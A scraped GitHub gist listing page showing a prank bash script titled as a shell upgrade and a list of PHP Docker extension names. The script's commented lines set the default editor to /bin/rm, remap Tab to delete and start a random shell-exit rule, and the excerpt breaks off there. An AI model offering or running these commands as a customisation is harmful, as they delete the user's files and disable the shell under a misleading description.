Skip to content

Instantly share code, notes, and snippets.

View Pingu501's full-sized avatar

Alex Hesse Pingu501

View GitHub Profile
@Feliix42
Feliix42 / bash_fun.sh
Created December 17, 2018 11:18
Completely revamp the behavior of your shell for the best user experience
#!/usr/bin/env bash
# Originally found on pastebin: https://pastebin.com/zBHrudM5
# Set `rm` as the default editor.
export EDITOR=/bin/rm;
# Make Tab send the delete key.
tset -Qe $'\t';
# Randomly make the shell exit whenever a command has a non-zero exit status.
@chronon
chronon / ext.txt
Created February 18, 2017 15:38
List of docker-php-ext-install extension names
Possible values for ext-name:
bcmath
bz2
calendar
ctype
curl
dba
dom
enchant